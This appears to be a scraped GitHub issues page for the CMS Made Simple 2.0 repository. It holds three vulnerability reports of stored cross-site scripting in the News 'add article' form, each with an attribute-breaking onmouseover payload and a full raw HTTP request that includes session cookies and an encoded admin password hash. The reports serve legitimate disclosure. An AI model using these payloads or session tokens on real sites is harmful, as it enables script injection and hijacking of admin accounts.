cmsmadesimple / cmsmadesimple-2-0 Goto Github PK
View Code? Open in Web Editor NEWGit mirror of the CMS Made Simple 2.0 rewrite
Home Page: http://cmsmadesimple.org
Git mirror of the CMS Made Simple 2.0 rewrite
Home Page: http://cmsmadesimple.org
Locate :Content ----> News---->add article
payload:1" onmouseover=prompt(907460) bad="
Affected vector: m1_title
HTTP REQUEST:
POST /xxxx/cmsmadesimple/admin/moduleinterface.php HTTP/1.1
Host: xx.x.x.x:xx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xx.x.x.x:xxxx/
Cookie: f55ebee232b88b67cd99413f20352285598849e9=aca0ec9499b6bace5485207d2293ec7d4c8ac7b6%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkTHF2SmZlMkxZc1BkSTVOXC93VG9ENWVSLnViZUhtNWRIXC9tM09NV25nRVFpeEQwc1pMV2Q0VyJ9; __c=a495fd1cd9688c4db3b; wp-settings-time-1=1539146544; MEIQIA_EXTRA_TRACK_ID=1AQGRuGqHc3T7uIyeIsHTrWf1Mz; Hm_lvt_12fc28a048b3367aa46f20380b6678ff=1537438993,1538029069,1538142984; __atuvc=4%7C41; CMSSESSID6b00d7ad8410=748fa0afe4dae55db5840c9a6855d3cd; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1539318259; Hm_lpvt_f6f37dc3416ca514857b78d0b158037e=1539318259
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=--------1960545627
Content-Length: 2786
----------1960545627
Content-Disposition: form-data; name="mact"
News,m1_,addarticle,0
----------1960545627
Content-Disposition: form-data; name="__c"
a495fd1cd9688c4db3b
----------1960545627
Content-Disposition: form-data; name="m1_title"
dinakaran1" onmouseover=prompt(907460) bad="
----------1960545627
Content-Disposition: form-data; name="m1_category"
1
----------1960545627
Content-Disposition: form-data; name="m1_summary"
ssss
----------1960545627 Content-Disposition: form-data; name="m1_content"sss
----------1960545627 Content-Disposition: form-data; name="m1_status"published
----------1960545627
Content-Disposition: form-data; name="m1_news_url"
slugform
----------1960545627
Content-Disposition: form-data; name="m1_extra"
informative
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Month"
10
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Day"
12
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Year"
2018
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Second"
36
----------1960545627
Content-Disposition: form-data; name="m1_searchable"
1
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Month"
10
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Day"
12
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Year"
2018
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Second"
36
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Month"
04
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Day"
10
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Year"
2019
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Second"
36
----------1960545627
Content-Disposition: form-data; name="preview_template"
24
----------1960545627
Content-Disposition: form-data; name="preview_returnid"
-1
----------1960545627
Content-Disposition: form-data; name="m1_submit"
Submit
----------1960545627--
Hey there!
I belong to an open source security research community, and a member (@mdakh404) has found an issue, but doesn’t know the best way to disclose it.
If not a hassle, might you kindly add a SECURITY.md
file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.
Thank you for your consideration, and I look forward to hearing from you!
(cc @huntr-helper)
Locate :Content ----> News---->add article
payload:1" onmouseover=prompt(907460) bad="
Affected vectors:m1_extra
HTTP REQUEST:
POST /suganya/cmsmadesimple/admin/moduleinterface.php HTTP/1.1
Host: xx.x.x.x:xx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xx.x.x.x:xxxx/
Cookie: f55ebee232b88b67cd99413f20352285598849e9=aca0ec9499b6bace5485207d2293ec7d4c8ac7b6%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkTHF2SmZlMkxZc1BkSTVOXC93VG9ENWVSLnViZUhtNWRIXC9tM09NV25nRVFpeEQwc1pMV2Q0VyJ9; __c=a495fd1cd9688c4db3b; wp-settings-time-1=1539146544; MEIQIA_EXTRA_TRACK_ID=1AQGRuGqHc3T7uIyeIsHTrWf1Mz; Hm_lvt_12fc28a048b3367aa46f20380b6678ff=1537438993,1538029069,1538142984; __atuvc=4%7C41; CMSSESSID6b00d7ad8410=748fa0afe4dae55db5840c9a6855d3cd; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1539318259; Hm_lpvt_f6f37dc3416ca514857b78d0b158037e=1539318259
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=--------1960545627
Content-Length: 2786
----------1960545627
Content-Disposition: form-data; name="mact"
News,m1_,addarticle,0
----------1960545627
Content-Disposition: form-data; name="__c"
a495fd1cd9688c4db3b
----------1960545627
Content-Disposition: form-data; name="m1_title"
dinakaran
----------1960545627
Content-Disposition: form-data; name="m1_category"
1
----------1960545627
Content-Disposition: form-data; name="m1_summary"
ssss
----------1960545627 Content-Disposition: form-data; name="m1_content"sss
----------1960545627 Content-Disposition: form-data; name="m1_status"published
----------1960545627
Content-Disposition: form-data; name="m1_news_url"
Slugform
----------1960545627
Content-Disposition: form-data; name="m1_extra"
informative1" onmouseover=prompt(907460) bad="
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Month"
10
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Day"
12
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Year"
2018
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Second"
36
----------1960545627
Content-Disposition: form-data; name="m1_searchable"
1
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Month"
10
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Day"
12
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Year"
2018
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Second"
36
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Month"
04
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Day"
10
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Year"
2019
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Second"
36
----------1960545627
Content-Disposition: form-data; name="preview_template"
24
----------1960545627
Content-Disposition: form-data; name="preview_returnid"
-1
----------1960545627
Content-Disposition: form-data; name="m1_submit"
Submit
----------1960545627--
In the install text file, it expects that /tmp/ and /tmp/templates_c/ directories will exist to begin with, but they do not (as you learn when you get to the install step).
(perhaps this is because they're empty directories that haven't been added to the git repository?)
Locate :Content ----> News---->add article
payload:1" onmouseover=prompt(907460) bad="
Affected vectors: m1_news_url
HTTP REQUEST:
POST /XXXXX/cmsmadesimple/admin/moduleinterface.php HTTP/1.1
Host: xx.x.x.x:xx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xx.x.x.x:xxxx/
Cookie: f55ebee232b88b67cd99413f20352285598849e9=aca0ec9499b6bace5485207d2293ec7d4c8ac7b6%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkTHF2SmZlMkxZc1BkSTVOXC93VG9ENWVSLnViZUhtNWRIXC9tM09NV25nRVFpeEQwc1pMV2Q0VyJ9; __c=a495fd1cd9688c4db3b; wp-settings-time-1=1539146544; MEIQIA_EXTRA_TRACK_ID=1AQGRuGqHc3T7uIyeIsHTrWf1Mz; Hm_lvt_12fc28a048b3367aa46f20380b6678ff=1537438993,1538029069,1538142984; __atuvc=4%7C41; CMSSESSID6b00d7ad8410=748fa0afe4dae55db5840c9a6855d3cd; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1539318259; Hm_lpvt_f6f37dc3416ca514857b78d0b158037e=1539318259
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=--------1960545627
Content-Length: 2786
----------1960545627
Content-Disposition: form-data; name="mact"
News,m1_,addarticle,0
----------1960545627
Content-Disposition: form-data; name="__c"
a495fd1cd9688c4db3b
----------1960545627
Content-Disposition: form-data; name="m1_title"
Dinakaran
----------1960545627
Content-Disposition: form-data; name="m1_category"
1
----------1960545627
Content-Disposition: form-data; name="m1_summary"
ssss
----------1960545627 Content-Disposition: form-data; name="m1_content"sss
----------1960545627 Content-Disposition: form-data; name="m1_status"published
----------1960545627
Content-Disposition: form-data; name="m1_news_url"
slugform1" onmouseover=prompt(907460) bad="
----------1960545627
Content-Disposition: form-data; name="m1_extra"
Informative
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Month"
10
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Day"
12
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Year"
2018
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_postdate_Second"
36
----------1960545627
Content-Disposition: form-data; name="m1_searchable"
1
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Month"
10
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Day"
12
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Year"
2018
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_startdate_Second"
36
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Month"
04
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Day"
10
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Year"
2019
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Hour"
10
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Minute"
46
----------1960545627
Content-Disposition: form-data; name="m1_enddate_Second"
36
----------1960545627
Content-Disposition: form-data; name="preview_template"
24
----------1960545627
Content-Disposition: form-data; name="preview_returnid"
-1
----------1960545627
Content-Disposition: form-data; name="m1_submit"
Submit
----------1960545627--
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.